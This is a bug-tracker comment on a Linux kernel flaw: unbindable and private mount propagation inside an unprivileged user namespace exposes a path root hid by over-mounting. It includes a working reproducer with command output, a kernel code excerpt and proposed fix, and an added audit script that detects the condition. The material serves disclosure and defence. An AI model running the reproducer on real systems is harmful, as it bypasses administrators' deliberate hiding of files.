Comment 4 for bug 1789161

Christian Brauner (cbrauner) wrote : Re: [Bug 1789161] Re: Bypass of mount visibility through userns + mount propagation

> Bug description:
> Jonathan Calmels from NVIDIA reported that he's able to bypass the
> mount visibility security check in place in the Linux kernel by using
> a combination of the unbindable property along with the private mount
> propagation option to allow an unprivileged user to see a path which
> was purposefully hidden by the root user.

So what we think happens is that copy_tree() simply skips unbindable mounts.

   /* excerpt from copy_tree() in fs/namespace.c: unbindable mounts are
    * skipped, whether or not they carry MNT_LOCKED */
   for (s = r; s; s = next_mnt(s, r)) {
           if (!(flag & CL_COPY_UNBINDABLE) &&
               IS_MNT_UNBINDABLE(s)) {
                   s = skip_mnt_tree(s);
                   continue;
           }

The solution that just quickly springs to my mind - and I might be
totally wrong - is to not skip unbindable mounts when MNT_LOCKED is set.

>
> Reproducer:
> # Hide a path to all users using a tmpfs
> root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
> root@castiana:~#
>
> # As an unprivileged user, unshare user namespace and mount namespace
> stgraber@castiana:~$ unshare -U -m -r
>
> # Confirm the path is still not accessible
> root@castiana:~# ls /sys/devices/
>
> # Make /sys recursively unbindable and private
> root@castiana:~# mount --make-runbindable /sys
> root@castiana:~# mount --make-private /sys
>
> # Recursively bind-mount the rest of /sys over to /mnt
> root@castiana:~# mount --rbind /sys/ /mnt
>
> # Access our hidden /sys/devices as an unprivileged user
> root@castiana:~# ls /mnt/devices/
> breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
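The effect described in the comment above (a recursive bind copy silently dropping an unbindable submount, so that a path hidden by an over-mount becomes reachable through the copy) leaves a trace in /proc/self/mountinfo: the copy has no child mount where the source does. The following audit script is an added example, not code from the bug report, the kernel, or Ubuntu; it parses mountinfo lines, reports each mount's propagation state, and flags bind copies that lack a submount their source has. The mountinfo text embedded below is constructed to mirror the reproducer (tmpfs over /sys/devices, /sys marked unbindable, /sys rbind-mounted to /mnt); mount IDs and device numbers are invented. The missing-submount check is a heuristic, since a plain non-recursive bind legitimately has no children, so treat a hit as something to inspect rather than proof of the bypass.

```python
"""Audit /proc/self/mountinfo for bind copies that dropped a submount.

Added example; the sample mountinfo below is constructed, not captured
from a real system.
"""
import re
from dataclasses import dataclass

# Constructed sample in /proc/self/mountinfo format. Fields before " - ":
# mount id, parent id, major:minor, root, mount point, options, optional
# propagation fields (shared:N, master:N, propagate_from:N, unbindable).
# After " - ": fs type, source, super options.
SAMPLE_MOUNTINFO = """\
22 1 0:20 / /sys rw,nosuid,nodev,noexec,relatime unbindable - sysfs sysfs rw
45 22 0:39 / /sys/devices rw,relatime unbindable - tmpfs tmpfs rw
60 1 0:20 / /mnt rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw
23 1 0:5 / /dev rw,nosuid,relatime shared:2 - devtmpfs udev rw,size=8k
"""


def _unescape(s: str) -> str:
    """mountinfo escapes space, tab, newline and backslash as \\ooo octal."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), s)


@dataclass
class Mount:
    mount_id: int
    parent_id: int
    dev: str        # major:minor of the filesystem
    root: str       # root of this mount inside the filesystem
    point: str      # mount point as seen from the reading process
    opts: str
    optional: list  # propagation fields
    fstype: str
    source: str

    @property
    def unbindable(self) -> bool:
        return "unbindable" in self.optional

    @property
    def propagation(self) -> str:
        """shared / slave / unbindable / private, derived from the optional fields."""
        for f in self.optional:
            if f.startswith("shared:"):
                return "shared"
            if f.startswith("master:"):
                return "slave"
        return "unbindable" if self.unbindable else "private"


def parse_mountinfo(text: str) -> list:
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pre, _, post = line.partition(" - ")  # optional fields end at " - "
        f = pre.split()
        t = post.split()
        mounts.append(Mount(int(f[0]), int(f[1]), f[2], _unescape(f[3]),
                            _unescape(f[4]), f[5], f[6:], t[0], t[1]))
    return mounts


def _rel(child_point: str, parent_point: str) -> str:
    """Path of a child mount relative to its parent's mount point."""
    base = parent_point.rstrip("/")
    return child_point[len(base):] or "/"


def dropped_submounts(mounts: list) -> list:
    """Find pairs of mounts that expose the same subtree (same dev and root,
    i.e. one is a bind of the other) where one side has a child mount that
    the other side lacks at the same relative path.

    Returns (source point, copy point, missing child point, child unbindable).
    """
    findings = []
    for copy in mounts:
        copy_children = {_rel(c.point, copy.point)
                         for c in mounts if c.parent_id == copy.mount_id}
        for src in mounts:
            if src is copy or (src.dev, src.root) != (copy.dev, copy.root):
                continue
            for child in mounts:
                if child.parent_id != src.mount_id:
                    continue
                rel = _rel(child.point, src.point)
                if rel not in copy_children:
                    findings.append((src.point, copy.point, child.point,
                                     child.unbindable))
    return findings


def audit(text: str) -> list:
    """Parse mountinfo text and return the dropped-submount findings."""
    return dropped_submounts(parse_mountinfo(text))


if __name__ == "__main__":
    mounts = parse_mountinfo(SAMPLE_MOUNTINFO)
    for m in mounts:
        print(f"{m.point:<14} {m.fstype:<9} {m.propagation}")
    for src, copy, missing, unb in audit(SAMPLE_MOUNTINFO):
        tag = " (unbindable)" if unb else ""
        print(f"bind copy {copy} of {src} lacks submount {missing}{tag}")
```

Run it against a live system with `audit(open("/proc/self/mountinfo").read())`; on the constructed sample it reports that the /mnt copy of /sys has no counterpart for the unbindable /sys/devices mount, which is exactly the submount the reproducer makes reachable.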